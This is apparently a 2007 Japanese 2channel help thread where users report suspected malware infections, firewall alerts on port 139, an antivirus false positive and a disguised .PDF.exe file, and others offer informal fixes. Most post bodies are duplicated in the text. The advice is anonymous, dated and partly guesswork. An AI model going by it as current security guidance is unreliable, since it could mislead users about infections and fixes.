582 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:11:03
もし非常駐型のウィルスに感染した場合、ほっといても悪さしませんよね?
583 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:34:09
【使用OS】 XP
【MicrosoftUpdate】してます
【使用セキュリティソフト】 ノートン2006
【セキュリティソフトの定義ファイルは最新の状態であるか】してあります
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ウイルス検出されず。オンラインでも
【どんな症状が出るか】 起動したら、即自動定期にシャットダウン。
その時、コマンドプロンプトも起動されます。されてからシャットダウンです。
シャットダウンが早すぎて、何が描かれてるかわかりません。
【症状が出る前に何をやったか】UPローダのファイルを開きました。
【症状を解決しようとどのような処置を取ったか】 ウイルス検索
【その他の質問】
【MicrosoftUpdate】してます
【使用セキュリティソフト】 ノートン2006
【セキュリティソフトの定義ファイルは最新の状態であるか】してあります
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ウイルス検出されず。オンラインでも
【どんな症状が出るか】 起動したら、即自動定期にシャットダウン。
その時、コマンドプロンプトも起動されます。されてからシャットダウンです。
シャットダウンが早すぎて、何が描かれてるかわかりません。
【症状が出る前に何をやったか】UPローダのファイルを開きました。
【症状を解決しようとどのような処置を取ったか】 ウイルス検索
【その他の質問】
584 : ◆N9P3SuvBPo :2007/01/28(日) 20:50:09
>583
症状が>550と一緒だ…
セーフモードでシステムの復元はどうだ?
症状が>550と一緒だ…
セーフモードでシステムの復元はどうだ?
585 :583:2007/01/28(日) 20:57:16
550さんと同じ症状です。
それも、同じファイルを開けてらっしゃいます。
システムの復元試してみます。もしだめだったら、セットアップしなおせば
いいでしょうか?
それも、同じファイルを開けてらっしゃいます。
システムの復元試してみます。もしだめだったら、セットアップしなおせば
いいでしょうか?
586 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:58:58
>>583
即シャットダウンするのにどうやってウイルススキャンしたの?
即シャットダウンするのにどうやってウイルススキャンしたの?
587 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:59:34
出来ればそのファイルうp。
588 :583:2007/01/28(日) 21:03:21
妹のパソコンにその症状が現れたらしく、妹に聞くところ、「Alt」「Ctrl」
「Delete」をしたところ、シャットダウンがしなくてオンラインスキャンを
したとのこと、でも、実際に自分でやってみたけどシャットダウンします。
明日、パソコン屋にもって行っていくといっていたんで、今、何とかできた
らとここに書き込みさせていただいております。
「Delete」をしたところ、シャットダウンがしなくてオンラインスキャンを
したとのこと、でも、実際に自分でやってみたけどシャットダウンします。
明日、パソコン屋にもって行っていくといっていたんで、今、何とかできた
らとここに書き込みさせていただいております。
589 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:08:01
>>490
またしても「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。
代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi6992792988.jpg
http://www.virustotal.com/
またしても「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。
代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi6992792988.jpg
http://www.virustotal.com/
590 :545:2007/01/28(日) 21:10:14
>>545です。
>>573
ありがとうございます!
正しくこれでした。
次々に送られてきて、警告音は鳴るし本当に怖かったんですが
こちらのIPアドレスが特定されてたわけじゃなかったんですね。安心しました。
サイトの通りにやったら解決しました。
本当にありがとうございました。
>>573
ありがとうございます!
正しくこれでした。
次々に送られてきて、警告音は鳴るし本当に怖かったんですが
こちらのIPアドレスが特定されてたわけじゃなかったんですね。安心しました。
サイトの通りにやったら解決しました。
本当にありがとうございました。
591 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:11:11
592 : ◆N9P3SuvBPo :2007/01/28(日) 21:14:22
>590
どういたしまして
>588
セーフモードでシステムの復元は効果ありませんでしたか…
あと思いつくのはリカバリくらいしか…
どういたしまして
>588
セーフモードでシステムの復元は効果ありませんでしたか…
あと思いつくのはリカバリくらいしか…
593 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:20:47
エクスプロラー、もしくはexeファイルに感染してるってことなのかな?
疎いのでわかりません><
疎いのでわかりません><
595 :583:2007/01/28(日) 21:28:07
Alt+F4 も無理でした。
回答ありがとうございました。
リカバリー方向で考えます。
リカバリーの場合は、OSソフトとその他のハードウェアのソフトがあれば
だいじょぶですよね?初心者のもので。
回答ありがとうございました。
リカバリー方向で考えます。
リカバリーの場合は、OSソフトとその他のハードウェアのソフトがあれば
だいじょぶですよね?初心者のもので。
596 : ◆N9P3SuvBPo :2007/01/28(日) 21:38:51
>593
検出場所がJaneってことは2ch専ブラのログファイルだから問題無し。
まだネットに繋いでないんですよね?
・ルータは有る?
・ファイアーウォールは、Windowsのとマカフィーのどっち?
>595
初めてのリカバリか…
メーカーによってやり方が異なるので、説明書見たほうがいいぜ。
検出場所がJaneってことは2ch専ブラのログファイルだから問題無し。
まだネットに繋いでないんですよね?
・ルータは有る?
・ファイアーウォールは、Windowsのとマカフィーのどっち?
>595
初めてのリカバリか…
メーカーによってやり方が異なるので、説明書見たほうがいいぜ。
597 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:51:17
>>596
お前ホントいい奴だな・・・
お前ホントいい奴だな・・・
598 : ◆N9P3SuvBPo :2007/01/28(日) 21:54:51
>597そっすか?
困っている人、助けたいと言う気持ちは誰も変わらないと思いますが
困っている人、助けたいと言う気持ちは誰も変わらないと思いますが
599 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:08:26
◆N9P3SuvBPo
神の生まれかわりじゃ・・・・
ありがたやありがたや
神の生まれかわりじゃ・・・・
ありがたやありがたや
600 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:16:25
>>589
画像が消えるの早すぎ。
画像が消えるの早すぎ。
601 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:21:51
【使用OS】 WINDOWS XP HE V2002 SP2
【使用セキュリティソフト】 ウイルスバスター2007
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 無し
【症状が出る前に何をやったか】 覚えてません
【どんな症状が出るか】
ルーターの電源を入れなおすと毎回、以下の画面が右下に表示されます。
ソフトウェアによりインターネットからの情報の受信が要求されています。
不明
システム
疑わしいプログラムより、インターネットからリスニングソケットでのデータ受信が要求されています。
ポート 139
プロトコル TCP
接続先IPアドレス 0.0.0.0
許可OR拒否が選べるので、毎回拒否しております。
以前はこのようなことはありませんでした。
何卒ご教授お願いします
【使用セキュリティソフト】 ウイルスバスター2007
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 無し
【症状が出る前に何をやったか】 覚えてません
【どんな症状が出るか】
ルーターの電源を入れなおすと毎回、以下の画面が右下に表示されます。
ソフトウェアによりインターネットからの情報の受信が要求されています。
不明
システム
疑わしいプログラムより、インターネットからリスニングソケットでのデータ受信が要求されています。
ポート 139
プロトコル TCP
接続先IPアドレス 0.0.0.0
許可OR拒否が選べるので、毎回拒否しております。
以前はこのようなことはありませんでした。
何卒ご教授お願いします
602 : ◆N9P3SuvBPo :2007/01/28(日) 22:26:49
>601
ポート139といえば、NetBIOSだな。
しばらく拒否のまま様子見でいいんじゃね?
拒否にしといても不具合は無いと思いますけど
ポート139といえば、NetBIOSだな。
しばらく拒否のまま様子見でいいんじゃね?
拒否にしといても不具合は無いと思いますけど
603 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:50:13
>>602
レス大変感謝します。
NetBIOSをググってみます。
これ、警告表示される時に、数秒で勝手に消えてしまうんですよね。
拒否か許可か選択する前でも。
更には、「今後このエラーに関しては表示しない」ってチェックボタンがあって、
デフォルトでチェックが入ってるのもやっかいです。
ルーターの電源入れなおした後は、マウス握って常にスタンバってないといけないので。
レス大変感謝します。
NetBIOSをググってみます。
これ、警告表示される時に、数秒で勝手に消えてしまうんですよね。
拒否か許可か選択する前でも。
更には、「今後このエラーに関しては表示しない」ってチェックボタンがあって、
デフォルトでチェックが入ってるのもやっかいです。
ルーターの電源入れなおした後は、マウス握って常にスタンバってないといけないので。
604 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:58:49
>603
ルータ入れてて139に来るのか?
それはおかしい
ルータ入れてて139に来るのか?
それはおかしい
605 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:05:24
606 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:08:12
ポート139はイントラネット・LANなどを利用してるなら開けるとあるのですが、
LANなどは一切使用しておりません。
ポート139は閉じてもよろしいでしょうか?
http://www.saturn.dti.ne.jp/~jpug/doc/network/win_port_sec.html
↑ここのサイトを見て、ポート139と445を閉じようかと思うのですが・・・
インターネットに公開しているサーバは話が別だ。
公開サーバで139と445番ポートを開けておくのは非常に危険である。
外部に公開するサーバでは、これらのポートを開けておくべきではない。
ファイル・サーバをインターネット経由で利用するのは自殺行為に等しく、
139と445番ポートは必ずふさいでおくべきだ。
同じことはADSLで常時インターネットに接続しているクライアントにもいえる。
139番を閉じるには、137,138番と同様に「NetBIOS over TCP/IPを無効にする」を選べばよい。
445番を閉じるには「コントロールパネル」→「システム」→「ハードウェア」→
「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」
という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、
「スタートアップ」の種類を「無効」にする。
LANなどは一切使用しておりません。
ポート139は閉じてもよろしいでしょうか?
http://www.saturn.dti.ne.jp/~jpug/doc/network/win_port_sec.html
↑ここのサイトを見て、ポート139と445を閉じようかと思うのですが・・・
インターネットに公開しているサーバは話が別だ。
公開サーバで139と445番ポートを開けておくのは非常に危険である。
外部に公開するサーバでは、これらのポートを開けておくべきではない。
ファイル・サーバをインターネット経由で利用するのは自殺行為に等しく、
139と445番ポートは必ずふさいでおくべきだ。
同じことはADSLで常時インターネットに接続しているクライアントにもいえる。
139番を閉じるには、137,138番と同様に「NetBIOS over TCP/IPを無効にする」を選べばよい。
445番を閉じるには「コントロールパネル」→「システム」→「ハードウェア」→
「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」
という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、
「スタートアップ」の種類を「無効」にする。
607 : ◆N9P3SuvBPo :2007/01/28(日) 23:09:12
>605
それモデムってやつ
モデムとPCの間にあるのがルータ
それモデムってやつ
モデムとPCの間にあるのがルータ
608 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:11:48
ノートンを入れていますが、勝手にメールを送信しようとする
質問者:sayalove ウイルス情報は最新(10/4)にして、スキャンしましたが、ウイルスは発見されませんでした。しかし、ウイルスと思われる症状があります。
パソコンを起動すると「メッセージ○/○スキャン中」というメッセージが次々に開き、ダイアログも次々に開きます。
(例)
電子メールメッセージ
送信先は、
件名は)
を送信できませんでした。
メールサーバーに対する接続が中断したためです。電子メールクライアントを開いてメッセージ送信フォルダからメッセージを再送してください
・・と書かれています。
こんな感じなのですが、どうすればいいのでしょうか?
質問者:sayalove ウイルス情報は最新(10/4)にして、スキャンしましたが、ウイルスは発見されませんでした。しかし、ウイルスと思われる症状があります。
パソコンを起動すると「メッセージ○/○スキャン中」というメッセージが次々に開き、ダイアログも次々に開きます。
(例)
電子メールメッセージ
送信先は、
件名は)
を送信できませんでした。
メールサーバーに対する接続が中断したためです。電子メールクライアントを開いてメッセージ送信フォルダからメッセージを再送してください
・・と書かれています。
こんな感じなのですが、どうすればいいのでしょうか?
609 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:11:50
610 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:15:01
>>598
何かムカついた。
何かムカついた。
611 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:15:52
>>608
はいはい、マルチマルチ。
はいはい、マルチマルチ。
612 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:18:06
>>607
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
613 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:19:27
>>607
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
614 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:20:03
>>609
いや、ルータ内蔵モデム鴨試練
いや、ルータ内蔵モデム鴨試練
615 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:24:10
616 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:25:28
>614
それだと139に来るのがわからない
>613
ネットの向こうで何かしようとしてきてブロックしてる
OKだよ
それだと139に来るのがわからない
>613
ネットの向こうで何かしようとしてきてブロックしてる
OKだよ
617 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:26:20
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。
618 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:30:03
619 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:33:55
620 :601:2007/01/28(日) 23:39:59
はっきり覚えてませんが、かれこれ1ヶ月弱ぐらいこの状況が続いてます。
>>616さんが言う内容だと、
私がモデムの電源を入れ直す(IPアドレスとかが変更されるのでセキュリティー上、良いことと習ったので。)度に、
毎回毎回、特定の人物か特定の機械(プログラム?)が、私のPCの中を覗こうとしているということでしょうか?
電源入れなおしはIPアドレスが変わるので、瞬時に毎回それを捕捉してるということは一体どういうことなんでしょうか?
質問ばかりで大変申し訳ありません。
>>616さんが言う内容だと、
私がモデムの電源を入れ直す(IPアドレスとかが変更されるのでセキュリティー上、良いことと習ったので。)度に、
毎回毎回、特定の人物か特定の機械(プログラム?)が、私のPCの中を覗こうとしているということでしょうか?
電源入れなおしはIPアドレスが変わるので、瞬時に毎回それを捕捉してるということは一体どういうことなんでしょうか?
質問ばかりで大変申し訳ありません。
621 : ◆N9P3SuvBPo :2007/01/28(日) 23:43:30
>618
人大杉は専ブラで回避できるよ
本当はセキュリティ初心者スレで聞く質問なんだけどね。
人大杉は専ブラで回避できるよ
本当はセキュリティ初心者スレで聞く質問なんだけどね。
622 :601:2007/01/28(日) 23:45:40
623 : ◆N9P3SuvBPo :2007/01/28(日) 23:49:24
>622
いやいや、ここまで来たんだからもうここで質問しても良いと思うよ。
いやいや、ここまで来たんだからもうここで質問しても良いと思うよ。
624 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:51:28
>620
610さんを特定してるわけではないよ
そういうのがネット上では無数に流れてるということ
だからネット繋ぐときはFW機能が必要ってことだ
>621
すまん。これで終わる。
610さんを特定してるわけではないよ
そういうのがネット上では無数に流れてるということ
だからネット繋ぐときはFW機能が必要ってことだ
>621
すまん。これで終わる。
625 :601:2007/01/29(月) 00:03:21
>>623
ありがとうございます!
>>624
なるほど。
>>だからネット繋ぐときはFW機能が必要ってことだ
「FW」で思い出したのですが、もしかしたらFW機能をONにしたからかもしれません。
以前は、ウィンドウズのFW機能があるからいいや、干渉しあったりするかもしれないし、と勝手に思って、
ウイルスバスターのFWは起動させていませんでした。
はっきりは覚えてませんが、FWをONにした以降にこの現象がでるようになったかもしれません。
ウイルスバスターのFWがしっかり働いてくれているということですよね。
それにしても、ここまで毎回、向こうから何かしようとしている存在があるとは知りませんでした。
以前は一切こういうことは無かったので。
2007のFWの性能がいいということなのでしょう。以前のバージョンだと無反応でしたので。
とにかく2007がよく働いてくれている証拠と思って、あまり気にしないようにします。
沢山のレス大変ありがとうございました。
ありがとうございます!
>>624
なるほど。
>>だからネット繋ぐときはFW機能が必要ってことだ
「FW」で思い出したのですが、もしかしたらFW機能をONにしたからかもしれません。
以前は、ウィンドウズのFW機能があるからいいや、干渉しあったりするかもしれないし、と勝手に思って、
ウイルスバスターのFWは起動させていませんでした。
はっきりは覚えてませんが、FWをONにした以降にこの現象がでるようになったかもしれません。
ウイルスバスターのFWがしっかり働いてくれているということですよね。
それにしても、ここまで毎回、向こうから何かしようとしている存在があるとは知りませんでした。
以前は一切こういうことは無かったので。
2007のFWの性能がいいということなのでしょう。以前のバージョンだと無反応でしたので。
とにかく2007がよく働いてくれている証拠と思って、あまり気にしないようにします。
沢山のレス大変ありがとうございました。
626 :名無しさん@お腹いっぱい。:2007/01/29(月) 17:47:36
【使用OS】 windows XP sp2
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 avast! 4.7 home・bitdefender コマンドライン版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 Win32:Trojan-gen. {Other}
【どんな症状が出るか】 未確認
【症状が出る前に何をやったか】 特に無し
【症状を解決しようとどのような処置を取ったか】 特に無し
【その他の質問】
avast!のスクリーンセーバー起動中検査で検出されました。
ファイルはC:\Program Files\Rainmeter\uninst.exe
およびRainmeterのインストーラです。
Rainmeterの導入は二ヶ月ほど前ですが、
今までこのファイルが検出されたことはありません。
BitdefenderではError: File query failedと出て検査出来ず。
avast!の誤検出かと思い圧縮してALWILに提出しようとしましたが
Lhaplusでエラーが出てzip圧縮出来ませんでした。
BitdefenderやLhaplusの挙動がこんな感じということは
やはりこれは怪しいファイルなのでしょうか?
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 avast! 4.7 home・bitdefender コマンドライン版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 Win32:Trojan-gen. {Other}
【どんな症状が出るか】 未確認
【症状が出る前に何をやったか】 特に無し
【症状を解決しようとどのような処置を取ったか】 特に無し
【その他の質問】
avast!のスクリーンセーバー起動中検査で検出されました。
ファイルはC:\Program Files\Rainmeter\uninst.exe
およびRainmeterのインストーラです。
Rainmeterの導入は二ヶ月ほど前ですが、
今までこのファイルが検出されたことはありません。
BitdefenderではError: File query failedと出て検査出来ず。
avast!の誤検出かと思い圧縮してALWILに提出しようとしましたが
Lhaplusでエラーが出てzip圧縮出来ませんでした。
BitdefenderやLhaplusの挙動がこんな感じということは
やはりこれは怪しいファイルなのでしょうか?
627 : ◆N9P3SuvBPo :2007/01/29(月) 18:23:34
628 :名無しさん@お腹いっぱい。:2007/01/29(月) 18:51:36
>>627
有難うございます。
こんな便利なオンラインスキャンがあったんですね。
早速調べてみたところno virus foundが並んだので
喜んだのも束の間、ファイル情報のFile sizeの項目が0bytesでした。
このファイルが検出されたときに一度チェストに退避させたので、
復元させてみましたがファイルは現れるのに実行出来ません。
アクセス許可がない可能性があるという警告が出ます。
この操作でファイルは元通りになっているはずですよね?
bitdefenderなどのプログラムがエラーを出すのもこのせい
だと思われます。
しかしこれでは何故avast!だけ反応するのか余計に分かりません。
有難うございます。
こんな便利なオンラインスキャンがあったんですね。
早速調べてみたところno virus foundが並んだので
喜んだのも束の間、ファイル情報のFile sizeの項目が0bytesでした。
このファイルが検出されたときに一度チェストに退避させたので、
復元させてみましたがファイルは現れるのに実行出来ません。
アクセス許可がない可能性があるという警告が出ます。
この操作でファイルは元通りになっているはずですよね?
bitdefenderなどのプログラムがエラーを出すのもこのせい
だと思われます。
しかしこれでは何故avast!だけ反応するのか余計に分かりません。
629 : ◆N9P3SuvBPo :2007/01/29(月) 19:10:43
>628
avastの過剰反応or誤反応だろうな。
しかしアクセス許可が無いというのはどうもな〜…
リカbいやいやいや
他の人なら何か知ってるかも。
avastの過剰反応or誤反応だろうな。
しかしアクセス許可が無いというのはどうもな〜…
リカbいやいやいや
他の人なら何か知ってるかも。
630 :名無しさん@お腹いっぱい。:2007/01/29(月) 19:29:47
これか
http://www.virustotal.com/vt/en/resultadof?f7748772942bd8778dfd96efb06ea221
avast以外すべて no virus found
不安ならavastきってRainmeter最ダウンロードしてavastにおくってみれば?
http://www.virustotal.com/vt/en/resultadof?f7748772942bd8778dfd96efb06ea221
avast以外すべて no virus found
不安ならavastきってRainmeter最ダウンロードしてavastにおくってみれば?
631 :名無しさん@お腹いっぱい。:2007/01/29(月) 23:28:35
>>629-630
どうも有難うございます。
rainmeterの作者サイトとCOW&SCORPIONから
ダウンしてみようとしたらやはりどちらもavastが反応しました。
どうやら昨日から今日にかけての定義更新で誤検出が
起きるようになったようです。
それからアクセス許可の件ですが、
どうやらavastの常駐保護を完全に切っていないと、
感染したと判断されたファイルはたとえ復元しても
実行不可になるようでした。
とんだ早とちりだったようで、皆様お騒がせしてすいませんです。
私もリカbいやいやいやとなっていたので正直ほっとしています。
早速ALWILに誤検出レポートを送ろうと思います。
どうも有難うございます。
rainmeterの作者サイトとCOW&SCORPIONから
ダウンしてみようとしたらやはりどちらもavastが反応しました。
どうやら昨日から今日にかけての定義更新で誤検出が
起きるようになったようです。
それからアクセス許可の件ですが、
どうやらavastの常駐保護を完全に切っていないと、
感染したと判断されたファイルはたとえ復元しても
実行不可になるようでした。
とんだ早とちりだったようで、皆様お騒がせしてすいませんです。
私もリカbいやいやいやとなっていたので正直ほっとしています。
早速ALWILに誤検出レポートを送ろうと思います。
>>スレの皆さん
ここのおかげでデスクトップの復旧が出来ました。
本当に助かりました、ありがとうございます。
これで今晩はぐっすり眠れるんだお(^ω^ )♪
ここのおかげでデスクトップの復旧が出来ました。
本当に助かりました、ありがとうございます。
これで今晩はぐっすり眠れるんだお(^ω^ )♪
633 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:33:01
goggleを踏んでしまいました
ポップアップブロックされて特に何も起きませんでしたが・・・
【使用OS】 XP SP2
【MicrosoftUpdate】 先ほど確認した所最新の更新データはありませんでした
【使用セキュリティソフト】 avast4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】 今の所何も起きてません
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】ログにある様に カスペルスキー:オンライン ウイルススキャンを現在実行中です
【その他の質問】XPSP2なら全てブロックするとも書いてありましたが、実際の所どうなんでしょうか?
ポップアップブロックされて特に何も起きませんでしたが・・・
【使用OS】 XP SP2
【MicrosoftUpdate】 先ほど確認した所最新の更新データはありませんでした
【使用セキュリティソフト】 avast4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】 今の所何も起きてません
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】ログにある様に カスペルスキー:オンライン ウイルススキャンを現在実行中です
【その他の質問】XPSP2なら全てブロックするとも書いてありましたが、実際の所どうなんでしょうか?
634 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:34:02
sage忘れ
635 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:45:25
最近はフリーの製品の方が、有料製品よりも活躍しているっぽい。
224 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 09:21:32
NODで検出できないルートキットが出たよ。
http://vista.crap.jp/img/vi7012763290.jpg
457 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/25(木) 12:01:17
また"NOD32"で、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。
代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.crap.jp/img/vi7012774443.jpg
http://www.virustotal.com/
112 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/28(日) 21:10:05
再び「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。
代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi7012782119.jpg
http://www.virustotal.com/
344 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/30(火) 12:13:14 ID:S6Q5YfM90
四度も立て続けに、NOD32でまだ検出できないウイルスが出たみたいで。
もはやNOD32では、そこそこの安心感も得られない時代になったのを実感した。
Avast検出名:Delf-BAW
http://vista.crap.jp/img/vi7007571352.jpg
http://www.virustotal.com/
224 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 09:21:32
NODで検出できないルートキットが出たよ。
http://vista.crap.jp/img/vi7012763290.jpg
457 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/25(木) 12:01:17
また"NOD32"で、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。
代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.crap.jp/img/vi7012774443.jpg
http://www.virustotal.com/
112 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/28(日) 21:10:05
再び「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。
代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi7012782119.jpg
http://www.virustotal.com/
344 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/30(火) 12:13:14 ID:S6Q5YfM90
四度も立て続けに、NOD32でまだ検出できないウイルスが出たみたいで。
もはやNOD32では、そこそこの安心感も得られない時代になったのを実感した。
Avast検出名:Delf-BAW
http://vista.crap.jp/img/vi7007571352.jpg
http://www.virustotal.com/
636 :名無しさん@お腹いっぱい。:2007/01/30(火) 16:12:30
韓国から落した電子部品PDF
開けないので
NET検索では未検出ですが
KA7500.PDF .exe
351KB 07/01/04 20:32
Ka750ap.pdf .
4253KB 06/10/05 12:46
KA7500.PDF偽装ファイル? トロイぽで報告
MZP・…略This program must be run under Win32
略
0EBPak|setup.exe|SETUP|0|
略
Ka750ap.pdf
MZ略This program cannot be run in DOS mode
略
ペンギンでは見れないPDFのMS拡張?て事ないですよね
開けないので
NET検索では未検出ですが
KA7500.PDF .exe
351KB 07/01/04 20:32
Ka750ap.pdf .
4253KB 06/10/05 12:46
KA7500.PDF偽装ファイル? トロイぽで報告
MZP・…略This program must be run under Win32
略
0EBPak|setup.exe|SETUP|0|
略
Ka750ap.pdf
MZ略This program cannot be run in DOS mode
略
ペンギンでは見れないPDFのMS拡張?て事ないですよね
637 :名無しさん@お腹いっぱい。:2007/01/30(火) 19:11:50
PDF .exeの時点でoutでしょ
638 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:05:24
質問
ウイルスexeをjpgやavi等に偽装したやつ(空欄..exeではない)をダブルクリックしたとしても
ビューアやプレイヤーが立ち上がるだけで感染はしないよね?セキュリティーホールでもない限り…
空欄.exeは気をつけるとして上記の件は心配無用ですか?
ウイルスexeをjpgやavi等に偽装したやつ(空欄..exeではない)をダブルクリックしたとしても
ビューアやプレイヤーが立ち上がるだけで感染はしないよね?セキュリティーホールでもない限り…
空欄.exeは気をつけるとして上記の件は心配無用ですか?
639 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:28:31
【使用OS】XP SP2
【MicrosoftUpdate】してます
【使用セキュリティソフト】avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
nortonのオンラインチェック
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\XFVVDHCA\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\B2SBZH0X\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。
【どんな症状が出るか】特になし
【症状が出る前に何をやったか】ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】
avast! 4.7でスキャンし、出てきたウイルスを削除
nortonのオンラインチェック⇒上記のウイルス検出
nortonのサイトから無料駆除ツールYaha@mm用をDL後スキャン⇒感染ファイルなしと出る
改めてnortonのオンラインチェック⇒上記のウイルスは検出される
【その他の質問】どうすれば駆除できますか?
【MicrosoftUpdate】してます
【使用セキュリティソフト】avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
nortonのオンラインチェック
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\XFVVDHCA\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\B2SBZH0X\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。
【どんな症状が出るか】特になし
【症状が出る前に何をやったか】ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】
avast! 4.7でスキャンし、出てきたウイルスを削除
